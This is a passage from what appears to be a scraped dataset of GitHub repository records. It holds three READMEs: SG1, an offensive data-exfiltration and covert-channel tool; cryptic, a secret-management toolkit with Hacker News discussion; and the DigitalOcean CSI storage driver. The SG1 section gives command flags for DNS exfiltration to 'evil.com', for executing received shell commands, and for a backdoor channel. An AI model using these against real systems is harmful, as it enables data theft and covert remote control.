+ : + \\ \\ \\ `,\\ \\ `.`-|| `. `-. \n .-' |' _','<', ,' / / // | \\\\ \\ \\ `, ,`.`. `. `. `-. \n : - `. `. \n BECAUSE\n REASONS \n```\n\nSG1 is a wanna be swiss army knife for data encryption, exfiltration and covert communication. In its core `sg1` aims to be as simple to use as `nc` while maintaining high modularity internally, being a framework for bizarre exfiltration, data manipulation and transfer methods.\n\nHave you ever thought to have your chats or data transfers tunneled through encrypted, private and self deleting pastebins? What about sending that stuff to some dns client -> dns server bridge? Then TLS maybe? :D\n\n**WORK IN PROGRESS, DON'T JUDGE** \n\n[![Go Report Card](https://goreportcard.com/badge/github.com/evilsocket/sg1)](https://goreportcard.com/report/github.com/evilsocket/sg1)\n\n## The Plan\n\n- [x] Working utility to move data in one direction only ( `input channel` -> `module,module,...` -> `output channel` ).\n- [ ] Bidirectional communication, aka moving from the concept of `channel` to `tunnel`, each tunnel object should derive from [net.Conn](https://golang.org/pkg/net/#Conn) in order to use the Pipe method. *-work in progress-*\n- [ ] SOCKS5 tunnel implementation, once done sg1 can be used for browsing and tunneling arbitrary TCP communications.\n- [ ] Implement `sg1 -probe server-ip-here` and `sg1 -discover 0.0.0.0` commands, the sg1 client will use every possible channel to connect to the sg1 server and create a tunnel.\n- [ ] Deployment with `sg1 -deploy` command, with \"deploy tunnels\" like `-deploy ssh:user:password@host:/path/` (deploy tunnels can be obfuscated as well).\n- [ ] Orchestrator `sg1 -orchestrate config.json` to create a randomized and encrypted exfiltration chain of tunnels in a TOR-like network.\n\n## Installation\n\nMake sure you have at least **go 1.8** in order to build `sg1`, then:\n\n go get github.com/miekg/dns\n go get github.com/evilsocket/sg1\n\n cd $GOPATH/src/github.com/evilsocket/sg1/\n make\n\nIf you want to build for a different OS and / or architecture, you can instead do:\n\n GOOS=windows GOARCH=386 make\n\nAfter compilation, you will find the `sg1` binary inside the `build` folder, you can start with taking a look at the help menu:\n\n ./build/sg1 -h\n\n## Contribute\n\n0) Read the code, love the code, fix the code.\n1) Check `The Plan` section of this README and see what you can do.\n2) Grep for `TODO` and see how you can help.\n3) Implement a new module ( see `modules/raw.go` for very basic example or `modules/aes.go` for complete one ).\n4) Implement a new channel ( see `channels/*.go` ).\n5) Write tests, because I'm a lazy s--t.\n\n## Features\n\nThe main `sg1` operation logic is:\n\n while input.has_data() {\n data = input.read()\n foreach module in modules {\n data = module.process(data)\n }\n output.write(data)\n }\n\nKeep in mind that modules and channels can be piped one to another, just use `sg1 -h` to see a list of available channels and modules, try to pipe them and see what happens ^_^\n\n### Modules\n\nModules can be combined, for instance if you want to read from input, decrypt from AES and execute, you would use:\n\n -in:... -modules aes,exec -aes-mode decrypt -aes-key _somekeysomekey_ -out:...\n\n**raw** \n\nThe default mode, will read from input and write to output.\n\n**base64**\n\nWill read from input, encode in base64 and write to output.\n\n**aes** \n\nWill read from input, encrypt or decrypt (depending on `--aes-mode` parameter, which is `encrypt` by default) with `--aes-key` and write to output.\n\nExamples:\n\n -modules aes --aes-key y0urp4ssw0rd\n -modules aes -aes-modules decrypt --aes-key y0urp4ssw0rd\n\n**exec**\n\nWill read from input, execute as a shell command and pipe to output.\n\n### Channels\n\n**console**\n\nThe default channel, stdin or stdout depending on the direction.\n\n**tcp** \n\nA tcp server (if used as input) or client (as output).\n\nExamples:\n\n -in tcp:0.0.0.0:10000\n -out tcp:192.168.1.2:10000\n\n**udp** \n\nAn udp packet listener (if used as input) or client (as output).\n\nExamples:\n\n -in udp:0.0.0.0:10000\n -out udp:192.168.1.2:10000\n\n**tls**\n\nA tls tcp server (if used as input) or client (as output), it will automatically generate the key pair or load them via `--tls-pem` and `--tls-key` optional parameters.\n\nExamples:\n\n -in tls:0.0.0.0:10003\n -out tls:192.168.1.2:10003\n\n**icmp** \n\nIf used as output, data will be chunked and sent as ICMP echo packets, as input an ICMP listener will be started decoding those packets.\n\nExamples:\n\n -in icmp:0.0.0.0\n -out icmp:192.168.1.2\n\n**dns** \n\nIf used as output, data will be chunked and sent as DNS requests, as input a DNS server will be started decoding those requests. The accepted syntaxes are:\n\n dns:domain.tld@resolver:port\n\nIn which case, DNS requests will be performed (or decoded) for subdomains of `domain.tld`, sent to the `resolver` ip address on `port`.\n\n dns:domain.tld\n\nDNS requests will be performed (or decoded) for subdomains of `domain.tld` using default system resolver.\n\n dns\n\nDNS requests will be performed (or decode) for subdomains of `google.com` using default system resolver.\n\nExamples:\n\n -in dns:evil.com@0.0.0.0:10053\n -out dns:evil.com@192.168.1.2:10053\n -out dns:evil.com\n\n**pastebin**\n\nIf used as output, data will be chunked and sent to pastebin.com as private pastes, as input a pastebin listener will be started decoding those pastes.\n\nExamples:\n\n -in pastebin:YOUR-API-KEY/YOUR-USER-KEY\n -in pastebin:YOUR-API-KEY/YOUR-USER-KEY#some-stream-name\n -out pastebin:YOUR-API-KEY/YOUR-USER-KEY\n -out pastebin:YOUR-API-KEY/YOUR-USER-KEY#some-stream-name\n\n[This](https://pastebin.com/api#8 ) is how you can retrieve your user key given your api key.\n\n## Examples\n\nIn the following examples you will always see 127.0.0.1, but that can be any ip, the tool is tunnelling data locally as a PoC but it also works among different computers on any network (as shown by one of the pictures). Also note that the command line shown in those pictures might be different from this documentation, that is because the screenshots have been taken in different stages of developement, use this README as reference for the updated command line options.\n\n--\n\nTLS client -> server session (if no `--tls-pem` or `--tls-key` arguments are specified, a self signed certificate will be automatically generated by sg1):\n![tls](https://pbs.twimg.com/media/DPPSi8KW4AIVDVo.jpg:large)\n\nSimple file exfiltration over DNS:\n![file](https://pbs.twimg.com/media/DPH8KkAWsAE5rZZ.jpg:large)\n\nQuick and dirty AES encrypted chat over TCP:\n![aes-tcp](https://pbs.twimg.com/media/DPHAlOXWAAA9kKv.jpg:large)\n\nOr over ICMP:\n![icmp](https://pbs.twimg.com/media/DPfJ--aWsAEng-y.jpg:large)\n\nPastebin AES encrypted data tunnel with self deleting private pastes:\n![pastebin](https://pbs.twimg.com/media/DPQl7zoXUAAIdQ9.jpg:large)\n\nEncrypting data in AES and exfiltrate it via DNS requests:\n![aes-dns](https://pbs.twimg.com/media/DPHsSLwWkAEbg7P.jpg:large)\n\nExecuting commands encoded and sent via DNS requests:\n![exec](https://pbs.twimg.com/media/DPKgERnX0AEKuJn.jpg:large)\n\nUse several machines to create exfiltration tunnels ( tls -> dns -> command execution -> tcp ):\n![tunnel](https://pbs.twimg.com/media/DPPhxAnX4AI7UUV.jpg:large)\n\nTest with different operating systems ( tnx to [decoded](https://twitter.com/d3d0c3d) ):\n![freebsd](https://pbs.twimg.com/media/DPH0612UQAA3gzg.jpg:large)\n\nWith bouncing to another host:\n![bounce](https://pbs.twimg.com/media/DPHtBocWsAAyDVN.jpg:large)\n\nSome `stdin` -> `dns packets` -> `pastebin temporary paste` -> `stdout` hops:\n![hops](https://pbs.twimg.com/media/DPQ58EhW0AA7CFz.jpg:large)\n\nCovert backdoor channel using astebin streams and AES encryption:\n![streams](https://pbs.twimg.com/media/DPmGuXqWsAEEi48.jpg:large)\n\n## License\n\nSG1 was made with \u2665 by [Simone Margaritelli](https://www.evilsocket.net/) and it's released under the GPL 3 license.\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "domodwyer/cryptic", "link": "https://github.com/domodwyer/cryptic", "tags": [], "stars": 521, "description": "A sensible secret management toolkit (and Go library) for admins and programmers", "lang": "Go", "repo_lang": "", "readme": "[![Build Status](https://travis-ci.org/domodwyer/cryptic.svg?branch=master)](https://travis-ci.org/domodwyer/cryptic) [![GoDoc](https://godoc.org/github.com/domodwyer/cryptic?status.svg)](https://godoc.org/github.com/domodwyer/cryptic)\n\n

\n\n

\n

\nManage API keys, passwords, certificates, etc. with infrastructure you already use.\n

\n

\n\n- Proven encryption, by default uses *AES-256* with *SHA-256* for integrity checks.\n- Supports multiple data stores - use infrastructure you already have.\n- No dependency hell: single binary to store a secret, one more to fetch.\n- Use [Amazon KMS](https://aws.amazon.com/kms/) key wrapping to further control access to sensitive information.\n- Super **simple** to use!\n\n# Usage\nPut a password somewhere:\n```\n./put -name=ApiKey -value=\"be65d27ae088a0e03fd8e1331d90b01649464cb7\"\n```\n\nGet a password back out somewhere else:\n```\n./get -name=ApiKey\n```\n\nOr as part of a script (say, an environment variable):\n```\nexport API_KEY=$(get -name=ApiKey)\n```\n\n# Installation\nDownload a [release](https://github.com/domodwyer/cryptic/releases) for the binaries and get going straight away.\n\nDrop a simple YAML file in the same directory as the binary (`./cryptic.yml` or `/etc/cryptic/cryptic.yml` for a global configuration) to configure encryption and stores - below is a minimal example:\n\n```yml\nStore: \"db\"\nEncryptor: \"aes-gcm-pbkdf2\"\n\nDB:\n Host: \"127.0.0.1:3306\"\n Name: \"db-name\"\n Username: \"root\"\n Password: \"password\"\n\n# When in any \"pbkdf2\" Encryptor mode, the Key parameter is hashed\n# 4096 times with SHA-512 and used as the key for AES-256\n\nAES:\n Key: \"super-secret-key\" \n```\n\n# Configuration\nBellow are all the configurable options for Cryptic:\n```yml\n# Store can be either 'redis' or 'db'\nStore: \"db\"\n\nDB:\n Host: \"127.0.0.1:3306\"\n Name: \"db-name\"\n Username: \"root\"\n Password: \"password\"\n Table: \"secrets\"\n KeyColumn: \"name\"\n ValueColumn: \"data\"\n\nRedis:\n Host: \"127.0.0.1:6379\"\n DbIndex: 0\n Password: \"\"\n ReadTimeout: \"3s\"\n WriteTimeout: \"5s\"\n MaxRetries: 0\n\n# Encryptor can be either 'aes-gcm-pbkdf2', 'aes-pbkdf2', 'aes' or 'kms'\nEncryptor: \"kms\"\n\n# AES key size must be 16, 24 or 32 chars if encryptor = 'aes'\nAES:\n Key: \"changeme\"\n HmacKey: \"changeme\" # only needed if encryptor = 'aes'\n\n# KMS uses AES-256 and SHA256 for HMAC\nKMS:\n KeyID: \"427a117a-ac47-4c90-b7fe-b33fe1a7a241\"\n Region: \"eu-west-1\"\n```\n\n# Database\n\nThe database table is a simple key-value table, but **must** include a UNIQUE constraint on the key column. Below is a SQL snippet suitable for the default settings:\n\n```sql\nCREATE TABLE `secrets` (\n `id` int(11) unsigned NOT NULL AUTO_INCREMENT,\n `name` varchar(255) NOT NULL DEFAULT '',\n `data` blob NOT NULL,\n PRIMARY KEY (`id`),\n UNIQUE KEY `idx_name` (`name`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4\n```\n\n# Amazon KMS / Key Wrapping\n[Amazon KMS](https://aws.amazon.com/kms/) is a key-management service that provides key wrapping and auditing features (and more) that you can take advantage of to further secure your secrets.\n\nUsing IAM roles you can control read access to only your production machines for example, or only your dev team, or perhaps only certain users.\n\nCryptic gets a secure 512-bit key from KMS and uses that to encrypt your data. To decrypt, first the stored key is sent to KMS for decryption, and the result is used to decrypt the AES-256 encrypted secret locally - your encrypted secret can't be recovered without both KMS and your AES secret.\n\nIncluded is a [terraform](https://www.terraform.io/) configuration to generate a KMS key - `terraform apply` and it'll return a key ID such as `427a117a-ac47-4c90-b7fe-b33fe1a7a241` (or make it [manually](https://docs.aws.amazon.com/kms/latest/developerguide/create-keys.html)).\n\nAssuming you have the AWS CLI installed and credentials configured, all you need is to configure like above and go!\n\n# Library Usage / Source\n```\ngo get -v github.com/domodwyer/cryptic\n```\n\nFor an example of how to use the library, check out the `put` and `get` binaries - each are only 50 lines long!\n\nThe library supports storage of binary secrets, though the CLI tools currently don't. Retries/backoff/circuit-breaking/etc is left to the library user.\n\nPR's welcome - please target to the `dev` branch.\n\nOh, and **vendor this** and everything else if you value your sanity.\n\n# Testing\nUnit tests cover every aspect of the library, including integration tests.\n\nDon't run integration tests against production systems, they might go wild and ruin your day.\n\nFor redis: `REDIS_HOST=\"localhost:6379\" go test ./... -v -tags=\"integration\"`\n\nFor KMS: `AWS_REGION=\"eu-west-1\" KMS_KEY_ID=\"\" go test ./... -v -tags=\"awsintegration\"`\n\nOr combine them for double the fun.\n\n# Credits\n\nThe idea was largely taken from [credstash](https://github.com/fugue/credstash) - I just didn't want to install python + dependencies, and I wanted to use redis. Many of the same security implications mentioned on the credstash README apply to Cryptic too.\n\n# Improvements\n\n- More backends (S3/DynamoDB/memcached/MongoDB/etc)\n- Secret versioning/rotation/expiration\n- Support for pipelined requests to backends to reduce latency\n- Redis transactional existing-key check with `WATCH`\n", "readme_type": "markdown", "hn_comments": "I went with biscuit because it writes to a simple file and I am not worried about updating 2 secrets at once, particularly since I have a different file per app per environment.\nhttps://github.com/dcoker/biscuit/blob/master/README.mdThis is exactly the use case of https://github.com/gtank/cryptopastaAlthough, the only thing I can see it doing wrong is the use of passwords as keys https://github.com/domodwyer/cryptic/blob/6bd92fab6778dac26c... which is still an open issue in cryptopasta https://github.com/gtank/cryptopasta/issues/7Why does management deserve a toolkit? Why should it remain a secret?And is the toolkit really that much of a secret after it's been posted on HN?I think it's safe to say that the cat's out of the bag.So this is a neat idea, because Credstash and Sneaker are certainly not perfect gizmos, but it leads to the turtles problem: how do I securely handle the initial key that's being plopped on systems? If I can do that, I don't need Cryptic.I've become a big fan of Credstash over the last few months largely because it solves (well, more like makes irrelevant, I wouldn't really strongly say it's \"solved\") this problem through using AWS as a trusted third party. Further, Credstash actually handles key ACLs in a much, much smarter way in that it uses KMS encryption contexts, which can be dropped into an IAM policy's Condition block, to further restrict access to secrets. Cryptic doesn't seem to offer this, and its use of Redis as a backing store (itself intended to be used in trusted environments) makes me worried, too.If continuing along with this project--and please don't take this as discouraging, it seems largely reasonable as a thing!--I would look in more depth at how Credstash uses KMS and bloodily rip it off to improve Cryptic's KMS functionality; it's very, very good at what it's doing.I looked through the project and it is cryptic indeed.I will try to digest a little bit for people who aren't familiar with Go and by any chance read the project's README- The examples you see there with commands like `./put ...` `./get ...` are actual Go command line apps found in the `cmd` directory.What I mean is there are two command line applications which you actually might need to build separately one named `put` the other `get` . What they do, oh! well , never mind it should be crypting stuffs.After being tasked to do devops for like 6 months. I understand the pain of having more secrets than those of the secret agencies we see on the movies.Something that turn out to be true most of the times is, secrets should always be secrets. Managing secrets is supposed to be a secret.I find the Configuration on the README to be full of secrets I mean passwords , API keys e.t.c. And wondering if cryptic is aware of that and how it is going to address this.With my little understanding about security. I have a feeling that In some cases encryption is mistaken with secure.Cool! I've love to hear more about the security and crypto design. I started writing up some questions but after asking so many it feels like I should just check out the code and answer some of them for myself. Still, I left the discussion here in case you're interested :)I've been working on a similar tool in Rust: https://github.com/ketralnis/secrets. My focus has been less APIs and more person-to-person (e.g. sharing the team's twitter password between humans that need to use it) but I'd love to hear how you've solved some of the conceptual problems that I've struggled with in trying to make it secure.Some issues that I've struggled with:1. withstanding attacks on the file format, some of which are described in this paper: https://www.cs.ox.ac.uk/files/6487/pwvault.pdf. My answer has been the logging system that I talk about in Auditing below but I'd love to hear how you withstand some of these attacks in your system where it looks like you don't even control the file format (is that mysql?)2. bootstrapping trust. how do I know I haven't been MitM'd, and how can I avoid having to trust the server? My system has a public/private key for every user, so when I share a password with you I'm encrypting it to your public key. The worst possible case then is that I inject my public key claiming to be you because then I get the passwords instead of you. Preventing this while also allowing for public keys to be rotated after a compromise of a client machine is currently stumping me. My current solution is to keep a record of every public key I've seen before, when I see a new one prompt the user to double check it out-of-band (like SSH does), and to just refuse to ever use a new public key for a user that I've seen before. But I bet that users don't actually check this, just like with SSH. And ideally I wouldn't rely on less secure out-of-band communication channels.3. And speaking of verification, here's how I'm asking users if everything looks right: === secrets.vm ===\n common name: secrets.vm\n fingerprint: b957e10c998faa9909cff3ba4ec35485d04708c3ecc7481fe14d7f07bc0229cd\n public key: c15e697e4807793ef8a9461a7b2c6cf2266d1ec1480a594e83b54e7b75e07702\n public sign: f1db594eb55fe97657c57f2aa01afd1210a46d42d80d5552ac4d548162d4968e\n mnemonic: AM ROBE KIT OMEN BATE ICY TROY RON WHAT HIP OMIT SUP LID CLAY AVER LEAR CAVE REEL CAN PAM FAN LUND RIFT ACME\n does that look right? [y/n]\n\nAFAICT these word-based (it's rfc1751) or sentence based (as recommended by https://www.usenix.org/conference/usenixsecurity16/technical...) are the best we have but do users actually verify these? How do you help your users prove that your server is really your server before they store secrets in it, in a way that they'll actually verify?4. Auditing. How can I, as an end user or as an admin of the server, prove that the server hasn't been tampered with to inject rogue keys? Right now I have a sketch for a merkle tree type log system where the server (1) logs every action (2) links every \"fact\" (a key, a secret, a user) to an entry in the log and (3) signs every log entry along with the log entry before it. Then a user can reconstruct the current state of the database to make sure that it matches. The upside is that it's pretty hard to forge, but the downside is that it's prohibitively expensive to verify: you really have to check the whole thing so you don't want that happening every time you retrieve a secret. And there are some tricky bits like making sure that the log doesn't have orphan entries that are easy to get wrong. Do you have a good solution to the auditing problem?5. Keeping the crypto itself simple and auditable. I use libnacl for the actual crypto and openssl for TLS. I've found that simply writing down every way the crypto is used (https://github.com/ketralnis/secrets/blob/master/DESIGN.md) that I've found a lot of cases where it was too complicated and likely to be messed up. Finding that out made a big difference to me in how I write it: now I describe it first and then write the code and that has made a huge difference in keeping it simple. I don't see really any documentation on your crypto, how do you know you're doing it right?Its interesting to see a lot of alternative implementations of credstash pop up, there was one written in Haskell recently called \"credentials\".\nhttps://github.com/brendanhay/credentialsI don't know much about secret management. How does this compare to something like Vault?Edit: https://www.vaultproject.io/The readme doesn't say what databases are supported, and similarly the config example config file doesn't have a field to configure this either.The only clue is the example SQL for creating the table appears to be MySQL. Is Postgres supported?It's always good to see options out there. But honestly, having being working with Hashicorp's Vault for a while (https://www.vaultproject.io/) I really don't see the need for it. Vault is extremely simple to setup and has many more advanced features without sacrificing functionality. There is also Keywhiz (https://square.github.io/keywhiz/single_page.html) which also provides a nifty FUSE abstraction.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "digitalocean/csi-digitalocean", "link": "https://github.com/digitalocean/csi-digitalocean", "tags": ["csi", "kubernetes", "storage", "csi-plugin", "container-orchestration", "hacktoberfest"], "stars": 521, "description": "A Container Storage Interface (CSI) Driver for DigitalOcean Block Storage", "lang": "Go", "repo_lang": "", "readme": "# csi-digitalocean\n\n![](https://github.com/digitalocean/csi-digitalocean/workflows/test/badge.svg)\n\nA Container Storage Interface ([CSI](https://github.com/container-storage-interface/spec)) Driver for [DigitalOcean Block Storage](https://www.digitalocean.com/docs/volumes/). The CSI plugin allows you to use DigitalOcean Block Storage with your preferred Container Orchestrator.\n\nThe DigitalOcean CSI plugin is mostly tested on Kubernetes. Theoretically it\nshould also work on other Container Orchestrators, such as Mesos or\nCloud Foundry. Feel free to test it on other CO's and give us a feedback.\n\n## Releases\n\nThe DigitalOcean CSI plugin follows [semantic versioning](https://semver.org/).\nThe version will be bumped following the rules below:\n\n* Bug fixes will be released as a `PATCH` update.\n* New features (such as CSI spec bumps with no breaking changes) will be released as a `MINOR` update.\n* Significant breaking changes makes a `MAJOR` update.\n\n## Features\n\nBelow is a list of functionality implemented by the plugin. In general, [CSI features](https://kubernetes-csi.github.io/docs/features.html) implementing an aspect of the [specification](https://github.com/container-storage-interface/spec/blob/master/spec.md) are available on any DigitalOcean Kubernetes version for which beta support for the feature is provided.\n\nSee also the [project examples](/examples/kubernetes) for use cases.\n\n### Volume Expansion\n\nVolumes can be expanded by updating the storage request value of the corresponding PVC:\n\n```yaml\napiVersion: v1\nkind: PersistentVolumeClaim\nmetadata:\n name: csi-pvc\n namespace: default\nspec:\n [...]\n resources:\n requests:\n # The field below can be increased.\n storage: 10Gi\n [...]\n```\n\nAfter successful expansion, the _status_ section of the PVC object will reflect the actual volume capacity.\n\nImportant notes:\n\n* Volumes can only be increased in size, not decreased; attempts to do so will lead to an error.\n* Expanding a volume that is larger than the target size will have no effect. The PVC object status section will continue to represent the actual volume capacity.\n* Resizing volumes other than through the PVC object (e.g., the DigitalOcean cloud control panel) is not recommended as this can potentially cause conflicts. Additionally, size updates will not be reflected in the PVC object status section immediately, and the section will eventually show the actual volume capacity.\n\n### Raw Block Volume\n\nVolumes can be used in raw block device mode by setting the `volumeMode` on the corresponding PVC:\n\n```yaml\napiVersion: v1\nkind: PersistentVolumeClaim\nmetadata:\n name: csi-pvc\n namespace: default\nspec:\n [...]\n volumeMode: Block\n```\n\nImportant notes:\n\n* If using volume expansion functionality, only expansion of the underlying persistent volume is guaranteed. We do not guarantee to automatically\nexpand the filesystem if you have formatted the device.\n\n### Volume Snapshots\n\nSnapshots can be created and restored through `VolumeSnapshot` objects.\n\n**Note:**\n\nVersion 1 of the CSI driver supports v1alpha1 Volume Snapshots only.\n\nVersion 2 and 3 of the CSI driver supports v1beta1 Volume Snapshots only.\n\nVersion 4 and later of the CSI driver support v1 Volume Snapshots only, which is backwards compatible to v1beta1. However, version 3 renders snapshots unusable that had previously been marked as invalid. See the [csi-snapshotter](https://github.com/kubernetes-csi/external-snapshotter) documentation on the validating webhook and v1beta1 to v1 upgrade notes.\n\n---\n\nSee also [the example](/examples/kubernetes/snapshot).\n\n### Volume Statistics\n\nVolume statistics are exposed through the CSI-conformant endpoints. Monitoring systems such as Prometheus can scrape metrics and provide insights into volume usage.\n\n### Volume Transfer\n\nVolumes can be transferred across clusters. The exact steps are outlined in [our example](/examples/kubernetes/pod-single-existing-volume).\n\n## Installing to Kubernetes\n\n### Kubernetes Compatibility\n\nThe following table describes the required DigitalOcean CSI driver version per supported Kubernetes release.\n\n| Kubernetes Release | DigitalOcean CSI Driver Version |\n|--------------------|---------------------------------|\n| 1.19 | v3 |\n| 1.20 | v3 |\n| 1.21 | v3 |\n| 1.22 | v4 |\n| 1.23 | v4.2.0+ |\n| 1.24 | v4.3.0+ |\n| 1.25 | v4.4.0+ |\n| 1.26 | v4.5.0+ |\n\n---\n**Note:**\n\nThe [DigitalOcean Kubernetes](https://www.digitalocean.com/products/kubernetes/) product comes with the CSI driver pre-installed and no further steps are required.\n\n---\n\n### Driver modes\n\nBy default, the driver supports both the [controller and node mode](https://kubernetes-csi.github.io/docs/deploying.html).\nIt can manage DigitalOcean Volumes via the cloud API and mount them on the required node.\nThe actually used mode is determined by how the driver is deployed and configured.\nThe suggested release manifests provide separate deployments for controller and node modes, respectively.\n\nWhen running outside of DigitalOcean droplets, the driver can only function in **controller mode**.\nThis requires to set the `--region` flag to a valid DigitalOcean region slug in addition to the other flags.\n\nThe `--region` flag **must not** be set when running the driver on DigitalOcean droplets.\n\nAlternatively driver can be run in **node only mode** on DigitalOcean droplets.\nDriver would only handle node related requests like mount volume. Driver runs in **node only mode** when `--token` flag is not provided.\n\nSkip secret creation (section 1. in following deployment instructions) when using **node only mode** as API token is not required.\n\n| Modes | `--token` flag | `--region` flag |\n|-------------------------------------------|:----------------:|:----------------:|\n| Controller and Node mode in DigitalOcean |:white_check_mark:| :x: |\n| Controller only mode not in DigitalOcean |:white_check_mark:|:white_check_mark:|\n| Node only mode in DigitalOcean | :x: | :x: |\n\n### Requirements\n\n* `--allow-privileged` flag must be set to true for the API server\n* `--allow-privileged` flag must be set to true for the kubelet in Kubernetes 1.14 and below (flag does not exist in later releases)\n* `--feature-gates=KubeletPluginsWatcher=true,CSINodeInfo=true,CSIDriverRegistry=true` feature gate flags must be set to true for both the API server and the kubelet\n* Mount Propagation needs to be enabled. If you use Docker, the Docker daemon of the cluster nodes must allow shared mounts.\n\n#### 1. Create a secret with your DigitalOcean API Access Token\n\nReplace the placeholder string starting with `a05...` with your own secret and\nsave it as `secret.yml`:\n\n```yaml\napiVersion: v1\nkind: Secret\nmetadata:\n name: digitalocean\n namespace: kube-system\nstringData:\n access-token: \"a05dd2f26b9b9ac2asdas__REPLACE_ME____123cb5d1ec17513e06da\"\n```\n\nand create the secret using kubectl:\n\n```shell\n$ kubectl create -f ./secret.yml\nsecret \"digitalocean\" created\n```\n\nYou should now see the digitalocean secret in the `kube-system` namespace along with other secrets\n\n```shell\n$ kubectl -n kube-system get secrets\nNAME TYPE DATA AGE\ndefault-token-jskxx kubernetes.io/service-account-token 3 18h\ndigitalocean Opaque 1 18h\n```\n\n#### 2. Provide authentication data for the snapshot validation webhook\n\nSnapshots are validated through a `ValidatingWebhookConfiguration` which requires proper CA, certificate, and key data. The manifests in `snapshot-validation-webhook.yaml` should provide sufficient scaffolding to inject the data accordingly. However, the details on how to create and manage them is up to the user and dependent on the exact environment the webhook runs in. See the `XXX`-marked comments in the manifests file for user-required injection points. \n\nThe [official snapshot webhook example](https://github.com/kubernetes-csi/external-snapshotter/tree/master/deploy/kubernetes/webhook-example) offers a non-production-ready solution suitable for testing. For full production readiness, something like [cert-manager](https://cert-manager.io/) can be leveraged. \n\n\n#### 3. Deploy the CSI plugin and sidecars\n\nAlways use the [latest release](https://github.com/digitalocean/csi-digitalocean/releases) compatible with your Kubernetes release (see the [compatibility information](#kubernetes-compatibility)).\n\nThe [releases directory](deploy/kubernetes/releases) holds manifests for all plugin releases. You can deploy a specific version by executing the command\n\n```shell\n# Do *not* add a blank space after -f\nkubectl apply -fhttps://raw.githubusercontent.com/digitalocean/csi-digitalocean/master/deploy/kubernetes/releases/csi-digitalocean-vX.Y.Z/{crds.yaml,driver.yaml,snapshot-controller.yaml}\n```\n\nwhere `vX.Y.Z` is the plugin target version. (Note that for releases older than v2.0.0, the driver was contained in a single YAML file. If you'd like to deploy an older release you need to use `kubectl apply -fhttps://raw.githubusercontent.com/digitalocean/csi-digitalocean/master/deploy/kubernetes/releases/csi-digitalocean-vX.Y.Z.yaml`)\n\nIf you see any issues during the installation, this could be because the newly\ncreated CRDs haven't been established yet. If you call `kubectl apply -f` again\non the same file, the missing resources will be applied again.\n\nThe above does not include the snapshot validating webhook which needs extra configuration as outlined above. You may append `,snapshot-validation-webhook.yaml` to the `{...}` list if you want to install a (presumably configured) webhook as well. \n\n#### 4. Test and verify\n\nCreate a PersistentVolumeClaim. This makes sure a volume is created and provisioned on your behalf:\n\n```yaml\napiVersion: v1\nkind: PersistentVolumeClaim\nmetadata:\n name: csi-pvc\nspec:\n accessModes:\n - ReadWriteOnce\n resources:\n requests:\n storage: 5Gi\n storageClassName: do-block-storage\n```\n\nCheck that a new `PersistentVolume` is created based on your claim:\n\n```shell\n$ kubectl get pv\nNAME CAPACITY ACCESS MODES RECLAIM POLICY STATUS CLAIM STORAGECLASS REASON AGE\npvc-0879b207-9558-11e8-b6b4-5218f75c62b9 5Gi RWO Delete Bound default/csi-pvc do-block-storage 3m\n```\n\nThe above output means that the CSI plugin successfully created (provisioned) a\nnew Volume on behalf of you. You should be able to see this newly created\nvolume under the [Volumes tab in the DigitalOcean UI](https://cloud.digitalocean.com/droplets/volumes)\n\nThe volume is not attached to any node yet. It'll only attached to a node if a\nworkload (i.e: pod) is scheduled to a specific node. Now let us create a Pod\nthat refers to the above volume. When the Pod is created, the volume will be\nattached, formatted and mounted to the specified Container:\n\n```yaml\nkind: Pod\napiVersion: v1\nmetadata:\n name: my-csi-app\nspec:\n containers:\n - name: my-frontend\n image: busybox\n volumeMounts:\n - mountPath: \"/data\"\n name: my-do-volume\n command: [ \"sleep\", \"1000000\" ]\n volumes:\n - name: my-do-volume\n persistentVolumeClaim:\n claimName: csi-pvc\n```\n\nCheck if the pod is running successfully:\n\n```shell\nkubectl describe pods/my-csi-app\n```\n\nWrite inside the app container:\n\n```shell\n$ kubectl exec -ti my-csi-app /bin/sh\n/ # touch /data/hello-world\n/ # exit\n$ kubectl exec -ti my-csi-app /bin/sh\n/ # ls /data\nhello-world\n```\n\n## Upgrading\n\nWhen upgrading to a new Kubernetes minor version, you should upgrade the CSI\ndriver to match. See the table above for which driver version is used with each\nKubernetes version.\n\nSpecial consideration is necessary when upgrading from Kubernetes 1.11 or\nearlier, which uses CSI driver version 0.2 or earlier. In these early releases,\nthe driver name was `com.digitalocean.csi.dobs`, while in all subsequent\nreleases it is `dobs.csi.digitalocean.com`. When upgrading, use the commandline\nflag `--driver-name` to force the new driver to use the old name. Failing to do\nso will cause any existing PVs to be unusable since the new driver will not\nmanage them and the old driver is no longer running.\n\n## Configuration\n\n### Default volumes paging size\n\nSome CSI driver operations require paging through the volumes returned from the DO Volumes API. By default, the page size is not defined and causes the DO API to choose a value as specified in the [API reference](https://docs.digitalocean.com/reference/api/api-reference/#section/Introduction/Links-and-Pagination). In the vast majority of cases, this should work fine. However, for accounts with a very large number of volumes, the API server-chosen default page size may be too small to return all volumes within the configured (sidecar-provided) timeout.\n\nFor that reason, the default page size can be customized by passing the `--default-volumes-page-size` flag a positive number.\n\n---\n**Notes:**\n\n1. The user is responsible for selecting a value below the maximum limit mandated by the DO API. Please see the API reference link above to see the current limit.\n2. The configured sidecar timeout values may need to be aligned with the chosen page size. In particular, csi-attacher invokes `ListVolumes` to periodically synchronize the API and cluster-local volume states; as such, its timeout must be large enough to account for the expected number of volumes in the given account and region. \n3. The default page size does not become effective if an explicit page size (more precisely, _max entries_ in CSI spec speak) is passed to a given gRPC method.\n\n### API rate limiting\n\nDO API usage is subject to [certain rate limits](https://docs.digitalocean.com/reference/api/api-reference/#section/Introduction/Rate-Limit). In order to protect against running out of quota for extremely heavy regular usage or pathological cases (e.g., bugs or API thrashing due to an interfering third-party controller), a custom rate limit can be configured via the `--do-api-rate-limit` flag. It accepts a float value, e.g., `--do-api-rate-limit=3.5` to restrict API usage to 3.5 queries per second.\n\n---\n\n## Development\n\nRequirements:\n\n* Go at the version specified in `.github/workflows/test.yaml`\n* Docker (for building via the Makefile, post-unit testing, and publishing)\n\nDependencies are managed via [Go modules](https://github.com/golang/go/wiki/Modules).\n\nPRs from the code-hosting repository are automatically unit- and end-to-end-tested in our CI (implemented by Github Actions). See the [.github/workflows directory](.github/workflows) for details.\n\nFor every green build of the master branch, the container image `digitalocean/do-csi-plugin:master` is updated and pushed at the end of the CI run. This allows to test the latest commit 